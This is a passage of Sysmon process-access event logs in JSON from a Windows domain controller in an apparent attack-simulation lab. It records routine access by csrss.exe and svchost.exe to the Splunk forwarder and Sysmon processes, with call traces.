Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8369,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22CD-5F25-0000-00104A901100}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22CD-5F25-0000-00104A901100}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8370,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8371,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8372,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8373,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8374,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8375,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8376,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:41.428","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8377,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:41.428\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 